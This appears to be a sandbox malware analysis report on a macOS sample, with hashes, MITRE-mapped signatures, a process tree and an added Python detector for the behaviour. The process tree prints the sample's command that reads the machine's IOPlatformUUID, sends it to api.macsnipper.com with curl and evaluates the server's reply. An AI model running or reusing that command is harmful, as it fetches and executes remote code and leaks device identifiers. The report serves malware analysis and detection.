Analysis

  • max time kernel
    93s
  • max time network
    167s
  • platform
    macos-10.15_amd64
  • resource
    macos-20241106-en
  • resource tags

    arch:amd64
    arch:i386
    image:macos-20241106-en
    kernel:19b77a
    locale:en-us
    os:macos-10.15-amd64
    system
  • submitted
    17/02/2025, 18:06

General

  • Target

    Macos-Malware-Samples-main/0ee6c8fd43c03e8dc7ea081dfa428f22209ed658f4ae358b867de02030cfc69b

  • Size

    48KB

  • MD5

    c7049a42302fa05ac17127b788fe5da5

  • SHA1

    61852110485fa2234e54ffae923e44c9722aeaaf

  • SHA256

    0ee6c8fd43c03e8dc7ea081dfa428f22209ed658f4ae358b867de02030cfc69b

  • SHA512

    e12c5bd638f8116893a472513ba07bd8b01065622c8ecce8305b0044d2079a385a3a4a290ef360564b77e49a829f5aa4582486c4030ad874b2abde829ddbe513

  • SSDEEP

    24:xKA/8C28ekM6S98SczqaycObLmJLyxjFqUDhMK3iWAbO7fec48u6f4xu6Dj6sR+r:xlOdTh3mtyx8UFM5HbO7z4x+H6Dj6s6

Malware Config

Signatures

  • Exfiltration Over Alternative Protocol 1 TTPs 2 IoCs

    Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.

  • Queries the hardware information (I/O Kit registry). 1 TTPs 1 IoCs

    An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.

Processes

  • /bin/sh
    sh -c "sudo /bin/zsh -c \"/Users/run/Macos-Malware-Samples-main/0ee6c8fd43c03e8dc7ea081dfa428f22209ed658f4ae358b867de02030cfc69b\""
    1⤵
      PID:481
    • /bin/bash
      sh -c "sudo /bin/zsh -c \"/Users/run/Macos-Malware-Samples-main/0ee6c8fd43c03e8dc7ea081dfa428f22209ed658f4ae358b867de02030cfc69b\""
      1⤵
        PID:481
      • /usr/bin/sudo
        sudo /bin/zsh -c /Users/run/Macos-Malware-Samples-main/0ee6c8fd43c03e8dc7ea081dfa428f22209ed658f4ae358b867de02030cfc69b
        1⤵
          PID:481
          • /bin/zsh
            /bin/zsh -c /Users/run/Macos-Malware-Samples-main/0ee6c8fd43c03e8dc7ea081dfa428f22209ed658f4ae358b867de02030cfc69b
            2⤵
              PID:482
            • /Users/run/Macos-Malware-Samples-main/0ee6c8fd43c03e8dc7ea081dfa428f22209ed658f4ae358b867de02030cfc69b
              /Users/run/Macos-Malware-Samples-main/0ee6c8fd43c03e8dc7ea081dfa428f22209ed658f4ae358b867de02030cfc69b
              2⤵
                PID:482
            • /bin/sh
              sh -c "MACHINEID=\"\$(ioreg -ad2 -c IOPlatformExpertDevice | xmllint --xpath '//key[.=\"IOPlatformUUID\"]/following-sibling::*[1]/text()' -)\";CONTENT=\$(curl --connect-timeout 900 -L \"https://api.macsnipper.com/v9/hbold?machine_id=\$MACHINEID&pr=macsnipper\");eval \"\$CONTENT\""
              1⤵
                PID:483
              • /bin/bash
                sh -c "MACHINEID=\"\$(ioreg -ad2 -c IOPlatformExpertDevice | xmllint --xpath '//key[.=\"IOPlatformUUID\"]/following-sibling::*[1]/text()' -)\";CONTENT=\$(curl --connect-timeout 900 -L \"https://api.macsnipper.com/v9/hbold?machine_id=\$MACHINEID&pr=macsnipper\");eval \"\$CONTENT\""
                1⤵
                  PID:483
                • /usr/sbin/ioreg
                  ioreg -ad2 -c IOPlatformExpertDevice
                  1⤵
                    PID:485
                  • /usr/bin/xmllint
                    xmllint --xpath "//key[.=\"IOPlatformUUID\"]/following-sibling::*[1]/text()" -
                    1⤵
                      PID:486
                    • /usr/bin/curl
                      curl --connect-timeout 900 -L "https://api.macsnipper.com/v9/hbold?machine_id=79C87F0E-9227-5AAD-AA91-25F794E1F52E&pr=macsnipper"
                      1⤵
                        PID:488
                      • /usr/libexec/xpcproxy
                        xpcproxy com.apple.nsurlstoraged
                        1⤵
                          PID:491
                        • /usr/libexec/nsurlstoraged
                          /usr/libexec/nsurlstoraged --privileged
                          1⤵
                            PID:491
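The process tree above shows the sample's whole behaviour in one shell command: ioreg and xmllint read the IOPlatformUUID, curl sends it as machine_id to api.macsnipper.com, and whatever the server returns is handed straight to eval. What follows is an added example, not part of this report or of the sample, of a small detector that flags that chain from process command lines. The EVENTS list is constructed from the command lines shown above (escaped quotes kept as the sandbox rendered them); the finding names, regular expressions and helper functions are this example's own assumptions.

```python
"""Detector for the download-and-eval chain in the process tree above.

Added example; not part of the sandbox report or of the sample. EVENTS is
constructed from the command lines the report shows; finding names and
regexes are this example's own conventions.
"""
import re
from urllib.parse import urlsplit

# Constructed from the report's process tree: (pid, image, command line).
EVENTS = [
    (481, "/bin/sh",
     'sh -c "sudo /bin/zsh -c \\"/Users/run/Macos-Malware-Samples-main/'
     '0ee6c8fd43c03e8dc7ea081dfa428f22209ed658f4ae358b867de02030cfc69b\\""'),
    (482, "/bin/zsh",
     "/bin/zsh -c /Users/run/Macos-Malware-Samples-main/"
     "0ee6c8fd43c03e8dc7ea081dfa428f22209ed658f4ae358b867de02030cfc69b"),
    (483, "/bin/sh",
     r"""sh -c "MACHINEID=\"\$(ioreg -ad2 -c IOPlatformExpertDevice | xmllint --xpath """
     r"""'//key[.=\"IOPlatformUUID\"]/following-sibling::*[1]/text()' -)\";"""
     r"""CONTENT=\$(curl --connect-timeout 900 -L \"https://api.macsnipper.com/v9/hbold"""
     r"""?machine_id=\$MACHINEID&pr=macsnipper\");eval \"\$CONTENT\"""" + '"'),
    (485, "/usr/sbin/ioreg", "ioreg -ad2 -c IOPlatformExpertDevice"),
    (486, "/usr/bin/xmllint",
     'xmllint --xpath "//key[.=\\"IOPlatformUUID\\"]/following-sibling::*[1]/text()" -'),
    (488, "/usr/bin/curl",
     'curl --connect-timeout 900 -L "https://api.macsnipper.com/v9/hbold'
     '?machine_id=79C87F0E-9227-5AAD-AA91-25F794E1F52E&pr=macsnipper"'),
    (491, "/usr/libexec/xpcproxy", "xpcproxy com.apple.nsurlstoraged"),
]

HW_ID_QUERY = re.compile(r"IOPlatformExpertDevice|IOPlatformUUID")   # I/O Kit hardware id read
FETCH_TOOL = re.compile(r"\b(curl|wget)\b")
EVAL = re.compile(r"\beval\b")
# Stop at whitespace, quotes and backslashes so the escaped shell rendering does not bleed in.
URL = re.compile(r"https?://[^\s\"'\\)]+")
ID_PARAM = re.compile(r"^(?:machine|device|hw|host)_?id$|uuid", re.I)   # identifier-style query keys
UUID = re.compile(r"^[0-9A-Fa-f]{8}-(?:[0-9A-Fa-f]{4}-){3}[0-9A-Fa-f]{12}$")


def query_pairs(url):
    """Return (key, value) pairs of a URL's query string, in order; blank values kept."""
    return [part.partition("=")[::2] for part in urlsplit(url).query.split("&") if part]


def analyse(events):
    """Classify each process event and collect network IoCs.

    Returns a dict with:
      findings     list of (pid, finding-name)
      domains      sorted hostnames seen in command-line URLs
      urls         sorted URLs seen on command lines
      machine_ids  sorted UUID-shaped values sent as an identifier parameter
    """
    findings, domains, urls, machine_ids = [], set(), set(), set()
    seen = set()
    for pid, _image, cmd in events:
        if (pid, cmd) in seen:          # sandbox lists /bin/sh and /bin/bash for one PID
            continue
        seen.add((pid, cmd))
        if HW_ID_QUERY.search(cmd):
            findings.append((pid, "hardware_id_query"))        # discovery via ioreg/xmllint
        if FETCH_TOOL.search(cmd) and EVAL.search(cmd):
            findings.append((pid, "remote_script_eval"))       # fetched content fed to eval
        for url in URL.findall(cmd):
            urls.add(url)
            host = urlsplit(url).hostname
            if host:
                domains.add(host)
            for key, value in query_pairs(url):
                if ID_PARAM.search(key):
                    findings.append((pid, "identifier_sent_to_remote"))
                    if UUID.match(value):
                        machine_ids.add(value.upper())
    return {"findings": findings, "domains": sorted(domains),
            "urls": sorted(urls), "machine_ids": sorted(machine_ids)}


if __name__ == "__main__":
    for k, v in analyse(EVENTS).items():
        print(k, v)
```

The wrapper at PID 483 still carries the unexpanded `$MACHINEID`, so its URL is cut at `machine_id=` and yields no UUID; only the curl process at PID 488 carries the resolved IOPlatformUUID. Both URLs are kept because the host is the IoC that survives reboots and machine changes.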

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /var/db/nsurlstoraged/dafsaData.bin

    Filesize

    54KB

    MD5

    64f469698e53d0c828b7f90acd306082

    SHA1

    bcc041b3849e1b0b4104ffeb46002207eeac54f3

    SHA256

    d74d0e429343f5e1b3e0b9437e048917c4343a30cff068739ea898bad8e37ffd

    SHA512

    a8334d1304f2fbd32cfd0ca35c289a45c450746cf3be57170cbbe87b723b1910c2e950a73c1fb82de9dc5ed623166d339a05fec3d78b861a9254dc2cb51fab5f